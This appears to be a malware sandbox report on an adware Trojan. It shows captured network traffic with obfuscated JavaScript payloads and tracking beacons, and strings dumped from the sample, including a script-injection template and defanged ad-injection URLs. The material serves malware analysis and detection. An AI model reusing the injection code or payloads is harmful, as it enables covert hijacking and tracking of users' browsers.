"\x79\x6F\x6E\x74\x6F\x6F\x5F\x64\x65\x74\x65\x63\x74\x65\x64":65536,"\x61\x76\x67\x5F\x73\x61\x66\x65\x67\x75\x61\x72\x64\x5F\x64\x65\x74\x65\x63\x74\x65\x64":131072,"\x67\x65\x65\x6B\x5F\x62\x75\
<<< skipped >>>
GET /plugins/mins/180.js?ver=20&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1450608507"
Last-Modified: Sun, 20 Dec 2015 10:48:27 GMT
Cache-Control: max-age=125
Content-Length: 1407
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds027.fr7.c
if (typeof setup2 === 'function') { setup2('MTY2MDcxNDQwMTBlMTkwMjM3MTQwMTQ4NDI0NjRiMTIxOTA2MTI1YzQyNDUxOTQ4MWExNDAyMDUxMjBhMGMwNDFkMTU0NzE5MDIxZjRkMDc0MzFhMTAxNjU2NGM1ZjQ0MTAwMzBiNTg0NTM5MzYzOTNmM2QzMTM1M2YyMzNjMjMzYjI1MjgyYTM2MjMyMzJlM2QyMjM2MjkzODMwM2QyZjI5MzUyNzQwNWY0ODViM2MwMzBiMDg1NzI3MzkyYTI4MjIyMTMxMzQyNDJlM2QzNDM2M2IzZDIyM2QyODJjMjczZDM5MzY1YzViNDA1NDE0MDgwYzRiNWIzNjI1MmUyMDJkMzUzZTM4MzEyMjJjMjgzMjI3MzEyMzNmMzUzMTIyMzYyNTRiNDQ1MDUwMWYwZjFlNTc1NDRjNWU0NTUwNTAwYjVkNGI1MTVhNGQ1ZjQ0NWI1MDU5NWM0ZDUxNWI1YzE5MTcwYjAyNTAzNTI3MjUzYjM1M2UyMTMwMmYyOTJmMmEzOTI4MmEzZDJkMmIyMjMyMzU1ZTEyMWMxMzA5NGYzZDM5MmUzODM3MzUzYTI4MjQzNjI3MzQzMjIzMzYzNTNkM2IyMTNlMjczNDMyM2YyYjIzM2IyNTI0MzYzZDM5NGY0NjcyNmY0YjEyMTkwNjEyMTUzODE4MTQ0NDUzNWE0ZjFhMTYxMjFkMTk0MjQ5NDYxYjQzMDEwYzA5MWExYTE0MDcwNzFmMWU1YzAxMDkwMDQ1MTk0ODE5MTIxZDRkNTQ1NDViMTgxZDAwNWI0NzMyMmQyMTM0MjIzOTJiMzQyMDNlMjgyMDNkMjMzNTNlM2QyODJkM2YyOTJkMzEzMzJmMzUzMTIyMzYyNTRiNDQ1MDUwMjMwYjE1MDM1NDI1MzIzMTMwMjkzZTM5MmEyZjJkM2YzZjJkMjMzNjNkMzUzNjI3MjQzZjMyMmQ0NDUwNWY1YzBhMDMwZjQ5NTAyZDNkMjUzZjI1MmIzNTNiMzMyOTM3MzAzOTM4MzkzZDM0MzYzMzI5MmQzZDQwNWI1ODRlMTQwYzFjNWM0ZjU0NTU1YTU4NGUwMDVlNDk1YTQxNTU1NDViNTM0ZTUyNWY0ZjVhNDA0NDEyMDgwMzFjNWIzNjI1MmUyMDJkMzUzZTM4MzEyMjJjMjgzMjMzMzIzNjMyMjMzYzM5MzY1YzE5MDcwYjAyNTAzNTI3MjUzYjM1M2UyMTMwMmYyOTJmMmEzOTIwMzQzZTI2MjMyYTIxMmYyYTM5M2MyOTI4MjAzZDJmMjkzNTI3NDQ0NTcwNjQ1MDEyMGExODBkMTEwODIwMWU0ZjQ4NDI1NzU1NWE3MjFi', 'mjxfizmrbf'); }....
<<< skipped >>>
GET /plugins/mins/91.js?ver=186&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1451210071"
Last-Modified: Sun, 27 Dec 2015 09:54:31 GMT
Cache-Control: max-age=441
Content-Length: 188421
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds012.fr7.c
(function(M){window.__loaderIsRunning__=false;var A=[].slice;var z={};var a=function(at){if(typeof at=="string"&&typeof at.trim=="function"){return at.trim();}return at==null?"":at.toString().replace(/^\s /,"").replace(/\s $/,"");};function f(at){var au=z[at]={},av,aw;at=at.split(/\s /);for(av=0,aw=at.length;av<aw;av ){au[at[av]]=true;}return au;}var H=function(at,au){var aw=[];for(var av=0;av<at.length;av ){if(av in at){var ax=au(at[av],av,at);if(ax!=null){aw.push(ax);}}}return aw;};var ad=function(aw,az,av){var au,ax=0,ay=aw.length,at=ay===undefined||appAPI.utils.isFunction(aw);if(av){if(at){for(au in aw){if(az.apply(aw[au],av)===false){break;}}}else{for(;ax<ay;){if(az.apply(aw[ax ],av)===false){break;}}}}else{if(at){for(au in aw){if(az.call(aw[au],au,aw[au])===false){break;}}}else{for(;ax<ay;){if(az.call(aw[ax],ax,aw[ax ])===false){break;}}}}return aw;};var J=function(av){av=av?(z[av]||f(av)):{};var aA=[],aB=[],aw,ax,au,ay,az,aD=function(aE){var aF,aI,aH,aG,aJ;for(aF=0,aI=aE.length;aF<aI;aF ){aH=aE[aF];aG=appAPI.utils.isArray(aH)?"array":(appAPI.utils.isFunction(aH)?"function":"");if(aG==="array"){aD(aH);}else{if(aG==="function"){if(!av.unique||!aC.has(aH)){aA.push(aH);}}}}},at=function(aF,aE){aE=aE||[];aw=!av.memory||[aF,aE];ax=true;az=au||0;au=0;ay=aA.length;for(;aA&&az<ay;az ){if(aA[az].apply(aF,aE)===false&&av.stopOnFalse){aw=true;break;}}ax=false;if(aA){if(!av.once){if(aB&&aB.length){aw=aB.shift();aC.fireWith(aw[0],aw[1]);}}else{if(aw===true){aC.disable();}else{aA=[];}}}},aC={add
<<< skipped >>>
GET /plugins/mins/253.js?ver=2&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:29 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1417718237"
Last-Modified: Thu, 04 Dec 2014 18:37:17 GMT
Cache-Control: max-age=900
Content-Length: 735
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422149.dop015.fr7.t,1456422149.cds049.fr7.c
if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MTgxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBmNGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MDdmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQxMTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1MjUyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMzU2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYwOTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMDQxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAzNDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }..
GET /monetization.gif?event=3&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&browser=ie,de,te,tc&rnd=1456422014 HTTP/1.1
Host: logs.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:15 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1456422135.dop003.fr7.t,1456422135.cds050.fr7.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 25 Feb 2016 17:42:15 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1456422135.dop003.fr7.t,1456422135.cds050.fr7.c..GIF89a.............,...........D..;..
GET /ThawteTimestampingCA.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.thawte.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "ed105ad04f9762dff775f597758fe83a:1450503189"
Last-Modified: Sat, 19 Dec 2015 05:15:01 GMT
Date: Thu, 25 Feb 2016 17:42:19 GMT
Content-Length: 341
Connection: keep-alive
Content-Type: application/pkix-crl
0..Q0..0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U....Durbanville1.0...U....Thawte1.0...U....Thawte Certification1.0...U....Thawte Timestamping CA..151217000000Z..160331235959Z0...*.H..............X...;J..b. ..>..P.T....u.^q;C..*8.....*!3......tZ<.Z......-....T...........>E2.....'s.ij.GL.........h.NNb.8.G..$.. u.7.....22.HTTP/1.1 200 OK..Server: Apache..ETag: "ed105ad04f9762dff775f597758fe83a:1450503189"..Last-Modified: Sat, 19 Dec 2015 05:15:01 GMT..Date: Thu, 25 Feb 2016 17:42:19 GMT..Content-Length: 341..Connection: keep-alive..Content-Type: application/pkix-crl..0..Q0..0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U....Durbanville1.0...U....Thawte1.0...U....Thawte Certification1.0...U....Thawte Timestamping CA..151217000000Z..160331235959Z0...*.H..............X...;J..b. ..>..P.T....u.^q;C..*8.....*!3......tZ<.Z......-....T...........>E2.....'s.ij.GL.........h.NNb.8.G..$.. u.7.....22...
GET /tss-ca-g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: ts-crl.ws.symantec.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "564b9f6a1d7f5e7549d605d810a7bf38:1456392807"
Last-Modified: Thu, 25 Feb 2016 09:01:25 GMT
Date: Thu, 25 Feb 2016 17:42:19 GMT
Content-Length: 477
Connection: keep-alive
Content-Type: application/pkix-crl
0...0.....0...*.H........0^1.0...U....US1.0...U....Symantec Corporation100...U...'Symantec Time Stamping Services CA - G2..160225090125Z..160306090125Z.00.0...U.#..0..._..n\..t...}.?..L...0...U........0...*.H.................A...X..1[...=/.G.j..1....,..8k...n.9.....@!....w.:..-....I.o.2.J...R.O".G....#...J..d7(.TZ.V._......H{.i...a..R&...6.@...ERM.w...a..N...O..g..6...)...r..z......o<...q...D....T.|.....?Ju....M..)S.............N...*....kh...<.\>7...:(!z.#....W...2..A.^.C.HTTP/1.1 200 OK..Server: Apache..ETag: "564b9f6a1d7f5e7549d605d810a7bf38:1456392807"..Last-Modified: Thu, 25 Feb 2016 09:01:25 GMT..Date: Thu, 25 Feb 2016 17:42:19 GMT..Content-Length: 477..Connection: keep-alive..Content-Type: application/pkix-crl..0...0.....0...*.H........0^1.0...U....US1.0...U....Symantec Corporation100...U...'Symantec Time Stamping Services CA - G2..160225090125Z..160306090125Z.00.0...U.#..0..._..n\..t...}.?..L...0...U........0...*.H.................A...X..1[...=/.G.j..1....,..8k...n.9.....@!....w.:..-....I.o.2.J...R.O".G....#...J..d7(.TZ.V._......H{.i...a..R&...6.@...ERM.w...a..N...O..g..6...)...r..z......o<...q...D....T.|.....?Ju....M..)S.............N...*....kh...<.\>7...:(!z.#....W...2..A.^.C...
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Thu, 28 Jan 2016 17:51:53 GMT
Accept-Ranges: bytes
ETag: "80823092f459d11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Date: Thu, 25 Feb 2016 17:42:19 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
1401D159F4929680B9....
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/octet-stream
Last-Modified: Thu, 28 Jan 2016 18:43:43 GMT
Accept-Ranges: bytes
ETag: "80d9e4cffb59d11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 49661
Date: Thu, 25 Feb 2016 17:42:19 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
MSCF............,...................I.......d.........<H.T .authroot.stl. ..-.8..CK...<Tk........./.........Z..e..P..D.&.BRTH...E..E.b.["$qS)....-...[..}.o~g...q...Y...n...........aF\!.lI.4..0..ef.W.....C`....Y..F.D5...Y.A....1.|..c.1...Nc.Y..x..D...NP[FX...O.s@.aN.....'.B......."(~3z-.@~..|}(.......g4.p.........h.n.dQz..t.V.......;.....Q...d/../.pJ...6....E...A.@..]..T9..28..,..p...).....P:}.K...]=.7X.f..9..yB.P....uP$$...Q.u..y..".=......7...........#.X..P.8....>U....v.[.$.e...H.@~..........ea`.3...tLX...].-....<.........v.....M../..z6.t^.....p....M...v(CP%F.......!eX..a...-..G.....S%..l.....Y..(.*.-....C.L0...G.....).rm8...(7.T{.Q...."...B`H.....3..9..-..Vv.5Q.e.W.../...RY.v.P. .........l......8'.&z......3.;:...U4.."....yu... .."....d .e/7.;.XD*tn%$.........];..fY.R...7.....o.=xh...]..4...\.:...v....t..9 .nO.i}.T../(uke..p.&.6.E#.=b...@.R.P...*.s....h......(/.s.%.3g...:*X.].7.IE....E,.w.8......v...r4.qOh}~..E.5t...l...(*..2....`..F..".a:.t....9...W.kO?5..=..HhYrI.Sf..[:...3..2..)DB...;......(...B.......U(...._F./#.k@....9c.Y..G'..]...p..;M_o..~.3?.}.1M.5.f5)._......t _.6...l..K....OsY.0......H...^..\$P;U....8..)...1........J...uE..#n.......h.......17.P=,P.....}z.&..../..a.........p@.|KB..o.E..|..o.mr......m=.(v.:.i....@..I..w>4y....P........F...&... ....r$d..{B...)..A.`..x4E'~`V.."..(..(./G...@_Q`.....O...~`..~...x..KN~....Dko/A{..!...W..G,`)...*...#......q`..H.........%m..G....5..4.....?.......F...{.%..2....l.L....."...Y........ ...].\........... D..Y...!1..*.....M?..G..A.|Ex......~...s.!.=..
<<< skipped >>>
GET /monetization.gif?rand=15720&event=7&agent_type=2&ibic=8D4C23D6A4134239976F389726A57621IE&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
Host: logs.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:23 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1456422143.dop003.fr7.t,1456422143.cds050.fr7.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 25 Feb 2016 17:42:23 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1456422143.dop003.fr7.t,1456422143.cds050.fr7.c..GIF89a.............,...........D..;..
GET /UTN-USERFirst-Object.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.usertrust.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 25 Feb 2016 17:42:22 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 75577
Last-Modified: Wed, 24 Feb 2016 21:00:01 GMT
Connection: close
ETag: "56ce19d1-12739"
X-CCACDN-Mirror-ID: h6edcacrl7
Cache-Control: max-age=3600
Accept-Ranges: bytes
0..'40..&....0...*.H........0..1.0...U....US1.0...U....UT1.0...U....Salt Lake City1.0...U....The USERTRUST Network1!0...U....hXXp://VVV.usertrust.com1.0...U....UTN-USERFirst-Object..160224210001Z..160228210001Z0..%.0"....2EY..aU..........050525083740Z0".....Iv...h ..ys.....050525090148Z0!..u.......|..xk.0...050602000000Z0".....6.z..........7..050602075356Z0"....!.$.KM(C@="..o}..050603153950Z0".......W%Ny.vD.q..Y..050607084159Z0".......3W]...$.#\F4..050613095931Z0!......(.62..2PLr.q..050630164737Z0"....BLA......)..5....050707141212Z0!..Wa........q#......050711082844Z0!.._j.....o...'...m..050715130339Z0!..?........N]B..Z...050721083234Z0!..RO.)@..Q...p._....050726090436Z0".....k......1.g......050729091017Z0"....l........o... ...050729134103Z0"....v.R..~...?.(..&..050803165854Z0!..6..;....sC.M.s:...050809135135Z0!...........^nH.U.(..050810132024Z0"......;.S...wU-K.c...050810211644Z0"......d..#IE..#|.g#..050811182050Z0"....!..|....]rR..-r..050817085053Z0"......Ai..xJ..q]Xi...050822140450Z0!..>...........t'6...050824025640Z0!..?3..rd5>ocV.. ....050824075512Z0"....|..5u[.}<..[.@...050908092147Z0!..GJ.C...<NM.i......050912092806Z0!....(.8....U.1.'....050912144650Z0!..*.(ECy.V.?x.3S_k..050915103419Z0!......./.....L...r..050919144257Z0!..Y....=....#.......050929000000Z0!..p.,.g.x..z:q~.....050930114111Z0"....-.."...\w...~....050930123007Z0!....o0........P.H...051004084832Z0".......=6......4.....051005122403Z0!..md\\...~.v.o......051013100954Z0!...6.D...hR..BO._...051013110610Z0!..5.x.1..6.p~}>.....0510181
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe_3000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
tCPjB
tCPjB
8%u(j
8%u(j
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
1.2.1
1.2.1
Invalid HTTP(S) status code
Invalid HTTP(S) status code
InternetCrackUrlW
InternetCrackUrlW
urlRedirected
urlRedirected
HttpQueryInfoW
HttpQueryInfoW
this module doesn't support file request
this module doesn't support file request
InternetCrackUrl Failed
InternetCrackUrl Failed
port
port
HttpOpenRequest Failed
HttpOpenRequest Failed
HttpSendRequest Failed with:
HttpSendRequest Failed with:
HttpQueryInfo Failed
HttpQueryInfo Failed
HttpQueryInfoA
HttpQueryInfoA
requestUrl
requestUrl
redirectUrl
redirectUrl
httpCode
httpCode
%d %d
%d %d
Mozilla\Mozilla Firefox
Mozilla\Mozilla Firefox
9%D,3
9%D,3
1.1.1.2
1.1.1.2
inflate 1.2.7 Copyright 1995-2012 Mark Adler
inflate 1.2.7 Copyright 1995-2012 Mark Adler
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
GetProcessWindowStation
GetProcessWindowStation
operator
operator
VERSION.dll
VERSION.dll
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
WININET.dll
WININET.dll
GetProcessHeap
GetProcessHeap
PeekNamedPipe
PeekNamedPipe
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
UrlEscapeW
UrlEscapeW
SHLWAPI.dll
SHLWAPI.dll
COMCTL32.dll
COMCTL32.dll
GetCPInfo
GetCPInfo
.?AVCAgentExe@@
.?AVCAgentExe@@
zcÃ
zcÃ
{A#ND$chromever=
{A#ND$chromever=
Advapi32.dll
Advapi32.dll
Chrome-Profiles
Chrome-Profiles
Firefox\Profiles
Firefox\Profiles
ie-error.gif
ie-error.gif
Wininet.dll
Wininet.dll
hXXps://
hXXps://
kernel32.dll
kernel32.dll
iexplore.exe
iexplore.exe
%d.%d.%d.%d
%d.%d.%d.%d
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
Google\Chrome\Application\chrome.exe
Google\Chrome\Application\chrome.exe
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Software\Mozilla\Mozilla Firefox
Software\Mozilla\Mozilla Firefox
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Mozilla Firefox\firefox.exe
Mozilla Firefox\firefox.exe
%d.%d (%d)
%d.%d (%d)
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\0x%x
\0x%x
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
@crtorpedoie
@crtorpedoie
if (document && document.location && typeof document.location.host == 'string' && document.location.host.indexOf('facebook.com') >= 0 && 194 !== PLUGIN_ID_PLACEHOLDER){
if (document && document.location && typeof document.location.host == 'string' && document.location.host.indexOf('facebook.com') >= 0 && 194 !== PLUGIN_ID_PLACEHOLDER){
var tag = (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]);
var tag = (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]);
K.setAttribute('src', httpUrl);
K.setAttribute('src', httpUrl);
K.setAttribute('src', httpsUrl);
K.setAttribute('src', httpsUrl);
if (!httpsUrl || httpsUrl.length === 0) {
if (!httpsUrl || httpsUrl.length === 0) {
if ((typeof document.location.protocol === 'string') && (document.location.protocol.indexOf('https') === 0)) {
if ((typeof document.location.protocol === 'string') && (document.location.protocol.indexOf('https') === 0)) {
K.setAttribute('type', 'text/javascript');
K.setAttribute('type', 'text/javascript');
var K = document.createElement('script');
var K = document.createElement('script');
var httpsUrl = '__HTTPS_URL_PLACEHOLDER__';
var httpsUrl = '__HTTPS_URL_PLACEHOLDER__';
var httpUrl = '__HTTP_URL_PLACEHOLDER__';
var httpUrl = '__HTTP_URL_PLACEHOLDER__';
tag.appendChild(K);
tag.appendChild(K);
}, 500);
}, 500);
if (!document || !document.body || !tag){
if (!document || !document.body || !tag){
if (!document || !document.body){
if (!document || !document.body){
__HTTP_URL_PLACEHOLDER__
__HTTP_URL_PLACEHOLDER__
__HTTPS_URL_PLACEHOLDER__
__HTTPS_URL_PLACEHOLDER__
hXXps://VVV.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=__CROSSRIDER_EXTENDED_SUB_ID__&partnername=__CROSSRIDER_APP_NAME__
hXXps://VVV.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=__CROSSRIDER_EXTENDED_SUB_ID__&partnername=__CROSSRIDER_APP_NAME__
hXXp://VVV.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=__CROSSRIDER_EXTENDED_SUB_ID__&partnername=__CROSSRIDER_APP_NAME__
hXXp://VVV.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=__CROSSRIDER_EXTENDED_SUB_ID__&partnername=__CROSSRIDER_APP_NAME__
hXXps://i_crdrjs_info.tlscdn.com/crdr/javascript.js?channel=crdr___CROSSRIDER_EXTENDED_SUB_ID__&appTitle=__CROSSRIDER_APP_NAME__&hid=__CROSSRIDER_USER_ID__
hXXps://i_crdrjs_info.tlscdn.com/crdr/javascript.js?channel=crdr___CROSSRIDER_EXTENDED_SUB_ID__&appTitle=__CROSSRIDER_APP_NAME__&hid=__CROSSRIDER_USER_ID__
hXXp://i.crdrjs.info/crdr/javascript.js?channel=crdr___CROSSRIDER_EXTENDED_SUB_ID__&appTitle=__CROSSRIDER_APP_NAME__&hid=__CROSSRIDER_USER_ID__
hXXp://i.crdrjs.info/crdr/javascript.js?channel=crdr___CROSSRIDER_EXTENDED_SUB_ID__&appTitle=__CROSSRIDER_APP_NAME__&hid=__CROSSRIDER_USER_ID__
hXXp://cdn.visadd.com/script/14567725765/preload.js?subid=__CROSSRIDER_SUB_ID__
hXXp://cdn.visadd.com/script/14567725765/preload.js?subid=__CROSSRIDER_SUB_ID__
hXXps://api.jollywallet.com/affiliate/client?dist=8&app_id=__CROSSRIDER_APP_ID__&s1=0&s2=0&s3=0&name=__CROSSRIDER_APP_NAME__
hXXps://api.jollywallet.com/affiliate/client?dist=8&app_id=__CROSSRIDER_APP_ID__&s1=0&s2=0&s3=0&name=__CROSSRIDER_APP_NAME__
hXXp://api.jollywallet.com/affiliate/client?dist=8&app_id=__CROSSRIDER_APP_ID__&s1=0&s2=0&s3=0&name=__CROSSRIDER_APP_NAME__
hXXp://api.jollywallet.com/affiliate/client?dist=8&app_id=__CROSSRIDER_APP_ID__&s1=0&s2=0&s3=0&name=__CROSSRIDER_APP_NAME__
hXXps://asrv-a.akamaihd.net/sd/1700/1043.js
hXXps://asrv-a.akamaihd.net/sd/1700/1043.js
hXXp://asrv-a.akamaihd.net/sd/1700/1043.js
hXXp://asrv-a.akamaihd.net/sd/1700/1043.js
hXXps://asrv-a.akamaihd.net/sd/1700/1037.js
hXXps://asrv-a.akamaihd.net/sd/1700/1037.js
hXXp://asrv-a.akamaihd.net/sd/1700/1037.js
hXXp://asrv-a.akamaihd.net/sd/1700/1037.js
hXXps://ads.tfxiq.com/a.php?626ref2=__CROSSRIDER_SUB_ID__&626Name=__CROSSRIDER_APP_NAME__&626ref3=__CROSSRIDER_USER_ID__&626ref1=63726f73737269646572&teid=__CROSSRIDER_APP_ID__&tuid=__CROSSRIDER_INSTALLER_USER_ID__
hXXps://ads.tfxiq.com/a.php?626ref2=__CROSSRIDER_SUB_ID__&626Name=__CROSSRIDER_APP_NAME__&626ref3=__CROSSRIDER_USER_ID__&626ref1=63726f73737269646572&teid=__CROSSRIDER_APP_ID__&tuid=__CROSSRIDER_INSTALLER_USER_ID__
hXXp://ads.tfxiq.com/a.php?626ref2=__CROSSRIDER_SUB_ID__&626Name=__CROSSRIDER_APP_NAME__&626ref3=__CROSSRIDER_USER_ID__&626ref1=63726f73737269646572&teid=__CROSSRIDER_APP_ID__&tuid=__CROSSRIDER_INSTALLER_USER_ID__
hXXp://ads.tfxiq.com/a.php?626ref2=__CROSSRIDER_SUB_ID__&626Name=__CROSSRIDER_APP_NAME__&626ref3=__CROSSRIDER_USER_ID__&626ref1=63726f73737269646572&teid=__CROSSRIDER_APP_ID__&tuid=__CROSSRIDER_INSTALLER_USER_ID__
